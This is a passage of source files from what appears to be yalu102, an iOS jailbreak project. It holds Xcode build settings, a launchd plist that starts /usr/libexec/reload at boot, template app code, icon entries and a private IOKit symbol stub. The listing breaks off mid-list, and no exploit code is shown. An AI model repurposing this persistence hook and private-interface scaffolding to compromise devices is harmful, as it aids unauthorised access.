"$(TARGET_NAME)"; 349 | VALID_ARCHS = armv7; 350 | }; 351 | name = Debug; 352 | }; 353 | EA9900FC1E1E9F060056FEBD /* Release */ = { 354 | isa = XCBuildConfiguration; 355 | buildSettings = { 356 | ARCHS = armv7; 357 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 358 | CLANG_ENABLE_OBJC_ARC = NO; 359 | DEVELOPMENT_TEAM = CGTX3WH3ZS; 360 | INFOPLIST_FILE = yalu102/Info.plist; 361 | LD_RUNPATH_SEARCH_PATHS = "$(inherited) @executable_path/Frameworks"; 362 | LIBRARY_SEARCH_PATHS = ( 363 | "$(inherited)", 364 | "$(PROJECT_DIR)/yalu102", 365 | ); 366 | PRODUCT_BUNDLE_IDENTIFIER = kim.cracksby.yalu102; 367 | PRODUCT_NAME = "$(TARGET_NAME)"; 368 | VALID_ARCHS = armv7; 369 | }; 370 | name = Release; 371 | }; 372 | /* End XCBuildConfiguration section */ 373 | 374 | /* Begin XCConfigurationList section */ 375 | EA9900DE1E1E9F060056FEBD /* Build configuration list for PBXProject "yalu102" */ = { 376 | isa = XCConfigurationList; 377 | buildConfigurations = ( 378 | EA9900F81E1E9F060056FEBD /* Debug */, 379 | EA9900F91E1E9F060056FEBD /* Release */, 380 | ); 381 | defaultConfigurationIsVisible = 0; 382 | defaultConfigurationName = Release; 383 | }; 384 | EA9900FA1E1E9F060056FEBD /* Build configuration list for PBXNativeTarget "yalu102" */ = { 385 | isa = XCConfigurationList; 386 | buildConfigurations = ( 387 | EA9900FB1E1E9F060056FEBD /* Debug */, 388 | EA9900FC1E1E9F060056FEBD /* Release */, 389 | ); 390 | defaultConfigurationIsVisible = 0; 391 | defaultConfigurationName = Release; 392 | }; 393 | /* End XCConfigurationList section */ 394 | }; 395 | rootObject = EA9900DB1E1E9F060056FEBD /* Project object */; 396 | } 397 | -------------------------------------------------------------------------------- /yalu102.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /yalu102/0.reload.plist: 
-------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Label 6 | 0.reload 7 | ProgramArguments 8 | 9 | /usr/libexec/reload 10 | 11 | RunAtLoad 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /yalu102/AppDelegate.h: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.h 3 | // yalu102 4 | // 5 | // Created by qwertyoruiop on 05/01/2017. 6 | // Copyright © 2017 kimjongcracks. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface AppDelegate : UIResponder 12 | 13 | @property (strong, nonatomic) UIWindow *window; 14 | 15 | 16 | @end 17 | 18 | -------------------------------------------------------------------------------- /yalu102/AppDelegate.m: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.m 3 | // yalu102 4 | // 5 | // Created by qwertyoruiop on 05/01/2017. 6 | // Copyright © 2017 kimjongcracks. All rights reserved. 7 | // 8 | 9 | #import "AppDelegate.h" 10 | 11 | @interface AppDelegate () 12 | 13 | @end 14 | 15 | @implementation AppDelegate 16 | 17 | 18 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions { 19 | // Override point for customization after application launch. 20 | return YES; 21 | } 22 | 23 | 24 | - (void)applicationWillResignActive:(UIApplication *)application { 25 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state. 26 | // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game. 
27 | } 28 | 29 | 30 | - (void)applicationDidEnterBackground:(UIApplication *)application { 31 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later. 32 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits. 33 | } 34 | 35 | 36 | - (void)applicationWillEnterForeground:(UIApplication *)application { 37 | // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background. 38 | } 39 | 40 | 41 | - (void)applicationDidBecomeActive:(UIApplication *)application { 42 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface. 43 | } 44 | 45 | 46 | - (void)applicationWillTerminate:(UIApplication *)application { 47 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:. 
48 | } 49 | 50 | 51 | @end 52 | -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipad-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipad-1.png -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipad.png -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadnotif.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadnotif.png -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl-1.png -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl.png -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl3.png -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptlsmal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptlsmal.png -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@3x~iphone.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@3x~iphone.png -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad-1.png -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad-2.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad-2.png -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad.png -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60.png -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x.png -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x~ipad.png -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x~ipadpro.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x~ipadpro.png -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@3x.png -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60~ipad.png -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "size" : "20x20", 5 | "idiom" : "iphone", 6 | "filename" : "AppIcon40x40~ipad-2.png", 7 | "scale" : "2x" 8 | }, 9 | { 10 | "size" : "20x20", 11 | "idiom" : "iphone", 12 | "filename" : "AppIcon60x60.png", 13 | "scale" : "3x" 14 | }, 15 | { 16 | "size" : "29x29", 17 | "idiom" : "iphone", 18 | "filename" : "AppIcon40x40@2x~ipadsptl.png", 19 | "scale" : "2x" 20 | }, 21 | { 22 | "size" : "29x29", 23 | "idiom" : "iphone", 24 | "filename" : "AppIcon40x40@2x~ipadsptl3.png", 25 | "scale" : "3x" 26 | }, 27 | { 28 | "size" : "40x40", 29 | "idiom" : "iphone", 30 | "filename" : "AppIcon40x40@2x~ipad-1.png", 31 | "scale" : "2x" 32 | }, 33 | { 34 | "size" : "40x40", 35 | "idiom" : "iphone", 36 | "filename" : "AppIcon40x40@3x~iphone.png", 37 | "scale" : "3x" 38 | }, 39 | { 40 | "size" : "60x60", 41 | "idiom" : "iphone", 42 | 
"filename" : "AppIcon60x60@2x.png", 43 | "scale" : "2x" 44 | }, 45 | { 46 | "size" : "60x60", 47 | "idiom" : "iphone", 48 | "filename" : "AppIcon60x60@3x.png", 49 | "scale" : "3x" 50 | }, 51 | { 52 | "size" : "20x20", 53 | "idiom" : "ipad", 54 | "filename" : "AppIcon40x40@2x~ipadnotif.png", 55 | "scale" : "1x" 56 | }, 57 | { 58 | "size" : "20x20", 59 | "idiom" : "ipad", 60 | "filename" : "AppIcon40x40~ipad-1.png", 61 | "scale" : "2x" 62 | }, 63 | { 64 | "size" : "29x29", 65 | "idiom" : "ipad", 66 | "filename" : "AppIcon40x40@2x~ipadsptlsmal.png", 67 | "scale" : "1x" 68 | }, 69 | { 70 | "size" : "29x29", 71 | "idiom" : "ipad", 72 | "filename" : "AppIcon40x40@2x~ipadsptl-1.png", 73 | "scale" : "2x" 74 | }, 75 | { 76 | "size" : "40x40", 77 | "idiom" : "ipad", 78 | "filename" : "AppIcon40x40~ipad.png", 79 | "scale" : "1x" 80 | }, 81 | { 82 | "size" : "40x40", 83 | "idiom" : "ipad", 84 | "filename" : "AppIcon40x40@2x~ipad.png", 85 | "scale" : "2x" 86 | }, 87 | { 88 | "size" : "76x76", 89 | "idiom" : "ipad", 90 | "filename" : "AppIcon60x60~ipad.png", 91 | "scale" : "1x" 92 | }, 93 | { 94 | "size" : "76x76", 95 | "idiom" : "ipad", 96 | "filename" : "AppIcon60x60@2x~ipad.png", 97 | "scale" : "2x" 98 | }, 99 | { 100 | "size" : "83.5x83.5", 101 | "idiom" : "ipad", 102 | "filename" : "AppIcon60x60@2x~ipadpro.png", 103 | "scale" : "2x" 104 | } 105 | ], 106 | "info" : { 107 | "version" : 1, 108 | "author" : "xcode" 109 | } 110 | } -------------------------------------------------------------------------------- /yalu102/Base.lproj/LaunchScreen.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /yalu102/Base.lproj/Main.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 
6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 33 | 39 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | -------------------------------------------------------------------------------- /yalu102/IOKit.tbd: -------------------------------------------------------------------------------- 1 | --- 2 | archs: [ armv7, armv7s, arm64, armv7k ] 3 | platform: ios 4 | install-name: /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit 5 | current-version: 275.0 6 | exports: 7 | - archs: [ armv7, armv7s, armv7k ] 8 | symbols: [ _IOConnectMethodScalarIScalarO, _IOConnectMethodScalarIStructureI, 9 | _IOConnectMethodScalarIStructureO, _IOConnectMethodStructureIStructureO, 10 | _IOMapMemory, _io_async_method_scalarI_scalarO, 11 | _io_async_method_scalarI_structureI, _io_async_method_scalarI_structureO, 12 | _io_async_method_structureI_structureO, _io_catalog_get_data, 13 | _io_catalog_get_gen_count, _io_catalog_module_loaded, 14 | _io_catalog_reset, _io_catalog_send_data, _io_catalog_terminate, 15 | _io_connect_add_client, _io_connect_async_method, 16 | _io_connect_get_notification_semaphore, _io_connect_get_service, 17 | _io_connect_map_memory, _io_connect_map_memory_into_task, 18 | _io_connect_method, _io_connect_method_scalarI_scalarO, 19 | _io_connect_method_scalarI_structureI, _io_connect_method_scalarI_structureO, 20 | _io_connect_method_structureI_structureO, _io_connect_method_var_output, 21 | _io_connect_set_notification_port, _io_connect_set_properties, 22 | _io_connect_unmap_memory, _io_connect_unmap_memory_from_task, 23 | _io_iterator_is_valid, _io_iterator_next, _io_iterator_reset, 24 | _io_object_conforms_to, _io_object_get_bundle_identifier, 25 | _io_object_get_class, _io_object_get_retain_count, 26 | _io_object_get_superclass, _io_registry_create_iterator, 27 | _io_registry_entry_create_iterator, _io_registry_entry_from_path, 28 | 
_io_registry_entry_from_path_ool, _io_registry_entry_get_child_iterator, 29 | _io_registry_entry_get_location_in_plane, _io_registry_entry_get_name, 30 | _io_registry_entry_get_name_in_plane, _io_registry_entry_get_parent_iterator, 31 | _io_registry_entry_get_path, _io_registry_entry_get_path_ool, 32 | _io_registry_entry_get_properties, _io_registry_entry_get_properties_bin, 33 | _io_registry_entry_get_property, _io_registry_entry_get_property_bin, 34 | _io_registry_entry_get_property_bytes, _io_registry_entry_get_property_recursively, 35 | _io_registry_entry_get_registry_entry_id, _io_registry_entry_in_plane, 36 | _io_registry_entry_set_properties, _io_registry_get_root_entry, 37 | _io_registry_iterator_enter_entry, _io_registry_iterator_exit_entry, 38 | _io_server_version, _io_service_acknowledge_notification, 39 | _io_service_add_interest_notification, _io_service_add_notification, 40 | _io_service_add_notification_bin, _io_service_add_notification_ool, 41 | _io_service_close, _io_service_get_authorization_id, 42 | _io_service_get_busy_state, _io_service_get_matching_service, 43 | _io_service_get_matching_service_bin, _io_service_get_matching_service_ool, 44 | _io_service_get_matching_services, _io_service_get_matching_services_bin, 45 | _io_service_get_matching_services_ool, _io_service_get_state, 46 | _io_service_match_property_table, _io_service_match_property_table_bin, 47 | _io_service_match_property_table_ool, _io_service_open_extended, 48 | _io_service_request_probe, _io_service_set_authorization_id, 49 | _io_service_wait_quiet ] 50 | - archs: [ armv7, armv7s, arm64, armv7k ] 51 | symbols: [ _IOAVAudioFormatTypeString, _IOAVAudioGetChannelAllocation, 52 | _IOAVAudioGetChannelAllocationDefault, _IOAVAudioGetChannelLayoutData, 53 | _IOAVAudioGetSpeakerAllocationMask, _IOAVAudioInterfaceCopyChannelLayoutElements, 54 | _IOAVAudioInterfaceCopyDiagnosticsString, _IOAVAudioInterfaceCopyElements, 55 | _IOAVAudioInterfaceCopyProperties, 
_IOAVAudioInterfaceCopyProperty, 56 | _IOAVAudioInterfaceCreate, _IOAVAudioInterfaceCreateWithService, 57 | _IOAVAudioInterfaceGetLinkData, _IOAVAudioInterfaceGetLinkDataWithSource, 58 | _IOAVAudioInterfaceGetService, _IOAVAudioInterfaceGetTypeID, 59 | _IOAVAudioInterfaceSetLogLevel, _IOAVAudioInterfaceSetLogLevelMask, 60 | _IOAVAudioInterfaceSetProperty, _IOAVAudioInterfaceStartLink, 61 | _IOAVAudioInterfaceStartLinkWithSource, _IOAVAudioInterfaceStopLink, 62 | _IOAVAudioInterfaceStopLinkWithSource, _IOAVAudioSampleRate, 63 | _IOAVAudioSampleRateScalar, _IOAVAudioSampleSize, 64 | _IOAVAudioSpeakerString, _IOAVCommandString, _IOAVControlInterfaceCopyDiagnosticsString, 65 | _IOAVControlInterfaceCopyProperties, _IOAVControlInterfaceCopyProperty, 66 | _IOAVControlInterfaceCreate, _IOAVControlInterfaceCreateWithService, 67 | _IOAVControlInterfaceGetService, _IOAVControlInterfaceGetTypeID, 68 | _IOAVControlInterfaceSetLogLevel, _IOAVControlInterfaceSetLogLevelMask, 69 | _IOAVControlInterfaceSetProperty, _IOAVControllerClearEventLog, 70 | _IOAVControllerCopyDiagnosticsString, _IOAVControllerCopyProperties, 71 | _IOAVControllerCopyProperty, _IOAVControllerCreate, 72 | _IOAVControllerCreateWithLocation, _IOAVControllerCreateWithService, 73 | _IOAVControllerForceHotPlugDetect, _IOAVControllerGetLocation, 74 | _IOAVControllerGetPower, _IOAVControllerGetTypeID, 75 | _IOAVControllerSetEventLogCommandMask, _IOAVControllerSetEventLogEventMask, 76 | _IOAVControllerSetEventLogSize, _IOAVControllerSetLogLevel, 77 | _IOAVControllerSetLogLevelMask, _IOAVControllerSetPower, 78 | _IOAVControllerSetProperty, _IOAVControllerSetProtectionType, 79 | _IOAVControllerSetQualityPattern, _IOAVCreateDiagnosticsReference, 80 | _IOAVCreateDiagnosticsReferenceWithLocation, _IOAVCreateDiagnosticsString, 81 | _IOAVCreateDiagnosticsStringWithLocation, _IOAVCreateStringWithAudioChannelLayoutData, 82 | _IOAVCreateStringWithAudioLinkData, _IOAVCreateStringWithData, 83 | _IOAVCreateStringWithElement, 
_IOAVCreateStringWithElements, 84 | _IOAVCreateStringWithVideoColorData, _IOAVCreateStringWithVideoLinkData, 85 | _IOAVCreateStringWithVideoTimingData, _IOAVDeviceClearEventLog, 86 | _IOAVDeviceCopyDiagnosticsString, _IOAVDeviceCopyProperties, 87 | _IOAVDeviceCopyProperty, _IOAVDeviceCreate, _IOAVDeviceCreateWithLocation, 88 | _IOAVDeviceCreateWithService, _IOAVDeviceGetController, 89 | _IOAVDeviceGetLinkData, _IOAVDeviceGetLocation, 90 | _IOAVDeviceGetPower, _IOAVDeviceGetProtectionStatus, 91 | _IOAVDeviceGetProtectionType, _IOAVDeviceGetTypeID, 92 | _IOAVDeviceReadI2C, _IOAVDeviceSetEventLogCommandMask, 93 | _IOAVDeviceSetEventLogEventMask, _IOAVDeviceSetEventLogSize, 94 | _IOAVDeviceSetLogLevel, _IOAVDeviceSetLogLevelMask, 95 | _IOAVDeviceSetPower, _IOAVDeviceSetProperty, _IOAVDeviceStartLink, 96 | _IOAVDeviceStopLink, _IOAVDeviceWriteI2C, _IOAVEDIDIsStandard, 97 | _IOAVElementTypeString, _IOAVEventLogEventTypeString, 98 | _IOAVGetCEAVideoShortID, _IOAVGetCEAVideoShortIDWithData, 99 | _IOAVGetCEAVideoShortIDWithDataActive, _IOAVGetCEAVideoTimingData, 100 | _IOAVGetCEAVideoTimingDataWithShortID, _IOAVGetCVTVideoTimingData, 101 | _IOAVGetDMTVideoTimingData, _IOAVGetGTFVideoTimingData, 102 | _IOAVGetSPDInfoFrame, _IOAVGetSupportedVideoTimingDataList, 103 | _IOAVGetTransportSupportsCEA, _IOAVGetTransportSupportsYCbCr, 104 | _IOAVGetVideoTimingData, _IOAVGetVideoTimingITSource, 105 | _IOAVHDMIAudioClockRegenerationDataForLink, _IOAVInfoFrameGetChecksum, 106 | _IOAVInfoFrameTypeString, _IOAVLinkSourceString, 107 | _IOAVLinkTypeString, _IOAVLocationString, _IOAVProtectionStatusString, 108 | _IOAVProtectionTypeString, _IOAVRecoverableError, 109 | _IOAVServiceClearEventLog, _IOAVServiceCopyDiagnosticsString, 110 | _IOAVServiceCopyEDID, _IOAVServiceCopyProperties, 111 | _IOAVServiceCopyProperty, _IOAVServiceCreate, _IOAVServiceCreateWithLocation, 112 | _IOAVServiceCreateWithService, _IOAVServiceGetDevice, 113 | _IOAVServiceGetLinkData, _IOAVServiceGetLinkDataWithSource, 
114 | _IOAVServiceGetPower, _IOAVServiceGetProtectionStatus, 115 | _IOAVServiceGetProtectionType, _IOAVServiceGetTypeID, 116 | _IOAVServiceSetEventLogCommandMask, _IOAVServiceSetEventLogEventMask, 117 | _IOAVServiceSetEventLogSize, _IOAVServiceSetLogLevel, 118 | _IOAVServiceSetLogLevelMask, _IOAVServiceSetPower, 119 | _IOAVServiceSetProperty, _IOAVServiceSetVirtualEDIDMode, 120 | _IOAVServiceStartInfoFrame, _IOAVServiceStartInfoFrameWithSource, 121 | _IOAVServiceStartLink, _IOAVServiceStartLinkWithSource, 122 | _IOAVServiceStopInfoFrame, _IOAVServiceStopInfoFrameWithSource, 123 | _IOAVServiceStopLink, _IOAVServiceStopLinkWithSource, 124 | _IOAVServiceSupportsLink, _IOAVStandardTypeString, 125 | _IOAVSupportedVideoTimingDataListTypeString, _IOAVTransportString, 126 | _IOAVVideoActiveFormatAspectRatio, _IOAVVideoAxisString, 127 | _IOAVVideoColorBitDepth, _IOAVVideoColorBitDepthScalar, 128 | _IOAVVideoColorCoefficientString, _IOAVVideoColorDynamicRangeString, 129 | _IOAVVideoColorSpaceString, _IOAVVideoGetPixelClockTolerance, 130 | _IOAVVideoInterfaceCopyColorElements, _IOAVVideoInterfaceCopyDiagnosticsString, 131 | _IOAVVideoInterfaceCopyProperties, _IOAVVideoInterfaceCopyProperty, 132 | _IOAVVideoInterfaceCopyTimingElements, _IOAVVideoInterfaceCreate, 133 | _IOAVVideoInterfaceCreateWithLocation, _IOAVVideoInterfaceCreateWithService, 134 | _IOAVVideoInterfaceGetLinkData, _IOAVVideoInterfaceGetLinkDataWithSource, 135 | _IOAVVideoInterfaceGetService, _IOAVVideoInterfaceGetTypeID, 136 | _IOAVVideoInterfaceSetBounds, _IOAVVideoInterfaceSetColorDitherRemoval, 137 | _IOAVVideoInterfaceSetLogLevel, _IOAVVideoInterfaceSetLogLevelMask, 138 | _IOAVVideoInterfaceSetProperty, _IOAVVideoInterfaceSetRotation, 139 | _IOAVVideoInterfaceStartLink, _IOAVVideoInterfaceStartLinkWithSource, 140 | _IOAVVideoInterfaceStopLink, _IOAVVideoInterfaceStopLinkWithSource, 141 | _IOAVVideoLinkModeString, _IOAVVideoTimingCalculatedTypeString, 142 | _IOAVVideoTimingGetActivePixelClock, 
_IOAVVideoTimingGetPixelClock, 143 | _IOAVVideoTimingGetSyncRateRounded, _IOAVVideoTimingTypeString, 144 | _IOAllowPowerChange, _IOBSDNameMatching, _IOCFSerialize, 145 | _IOCFURLWriteDataAndPropertiesToResource, _IOCFUnserialize, 146 | _IOCFUnserializeBinary, _IOCFUnserializeWithSize, 147 | _IOCFUnserializeparse, _IOCancelPowerChange, _IOCatalogueGetData, 148 | _IOCatalogueModuleLoaded, _IOCatalogueReset, _IOCatalogueSendData, 149 | _IOCatalogueTerminate, _IOCatlogueGetGenCount, _IOCloseConnection, 150 | _IOCompatibiltyNumber, _IOConnectAddClient, _IOConnectAddRef, 151 | _IOConnectCallAsyncMethod, _IOConnectCallAsyncScalarMethod, 152 | _IOConnectCallAsyncStructMethod, _IOConnectCallMethod, 153 | _IOConnectCallScalarMethod, _IOConnectCallStructMethod, 154 | _IOConnectGetService, _IOConnectMapMemory, _IOConnectMapMemory64, 155 | _IOConnectRelease, _IOConnectSetCFProperties, _IOConnectSetCFProperty, 156 | _IOConnectSetNotificationPort, _IOConnectTrap0, 157 | _IOConnectTrap1, _IOConnectTrap2, _IOConnectTrap3, 158 | _IOConnectTrap4, _IOConnectTrap5, _IOConnectTrap6, 159 | _IOConnectUnmapMemory, _IOConnectUnmapMemory64, 160 | _IOCopySystemLoadAdvisoryDetailed, _IOCreatePlugInInterfaceForService, 161 | _IOCreateReceivePort, _IODPCalculateM, _IODPCommandString, 162 | _IODPCompareLinkTrainingData, _IODPControllerCreate, 163 | _IODPControllerCreateWithLocation, _IODPControllerCreateWithService, 164 | _IODPControllerGetAVController, _IODPControllerGetMaxLaneCount, 165 | _IODPControllerGetMaxLinkRate, _IODPControllerGetMinLaneCount, 166 | _IODPControllerGetMinLinkRate, _IODPControllerGetTypeID, 167 | _IODPControllerSetDownspreadModulationFrequency, 168 | _IODPControllerSetDriveSettings, _IODPControllerSetLaneCount, 169 | _IODPControllerSetLinkRate, _IODPControllerSetMaxLaneCount, 170 | _IODPControllerSetMaxLinkRate, _IODPControllerSetMinLaneCount, 171 | _IODPControllerSetMinLinkRate, _IODPControllerSetSupportsALPM, 172 | _IODPControllerSetSupportsDownspread, 
_IODPControllerSetSupportsEnhancedMode, 173 | _IODPControllerSetSupportsScrambling, _IODPCreateStringWithLinkTrainingData, 174 | _IODPDeviceCreate, _IODPDeviceCreateWithLocation, 175 | _IODPDeviceCreateWithService, _IODPDeviceGetAVDevice, 176 | _IODPDeviceGetController, _IODPDeviceGetLinkTrainingData, 177 | _IODPDeviceGetMaxLaneCount, _IODPDeviceGetMaxLinkRate, 178 | _IODPDeviceGetRevisionMajor, _IODPDeviceGetRevisionMinor, 179 | _IODPDeviceGetSinkCount, _IODPDeviceGetSupportsDownspread, 180 | _IODPDeviceGetSupportsEnhancedMode, _IODPDeviceGetSymbolErrorCount, 181 | _IODPDeviceGetTypeID, _IODPDeviceReadDPCD, _IODPDeviceSetALPMEnabled, 182 | _IODPDeviceTypeString, _IODPDeviceWriteDPCD, _IODPDriveSettingsAreValid, 183 | _IODPEventLogEventTypeString, _IODPLinkMaxPixelRate, 184 | _IODPLinkRateEnum, _IODPLinkRateIsStandard, _IODPLinkRateScalar, 185 | _IODPLinkSymbolRate, _IODPServiceCreate, _IODPServiceCreateWithLocation, 186 | _IODPServiceCreateWithService, _IODPServiceGetAVService, 187 | _IODPServiceGetDevice, _IODPServiceGetSinkCount, 188 | _IODPServiceGetSymbolErrorCount, _IODPServiceGetTypeID, 189 | _IODPServiceRetrainLink, _IODPServiceSetLinkCheckEnable, 190 | _IODPStreamClockHz, _IODPTrainingPatternLength, 191 | _IODPVideoMinLinkRate, _IODataQueueAllocateNotificationPort, 192 | _IODataQueueDataAvailable, _IODataQueueDequeue, 193 | _IODataQueueEnqueue, _IODataQueuePeek, _IODataQueueSetNotificationPort, 194 | _IODataQueueWaitForAvailableData, _IODeregisterApp, 195 | _IODeregisterForSystemPower, _IODestroyPlugInInterface, 196 | _IODispatchCalloutFromCFMessage, _IODispatchCalloutFromMessage, 197 | _IOEthernetControllerCreate, _IOEthernetControllerGetBSDSocket, 198 | _IOEthernetControllerGetIONetworkInterfaceObject, 199 | _IOEthernetControllerGetTypeID, _IOEthernetControllerReadPacket, 200 | _IOEthernetControllerRegisterBSDAttachCallback, 201 | _IOEthernetControllerRegisterDisableCallback, _IOEthernetControllerRegisterEnableCallback, 202 | 
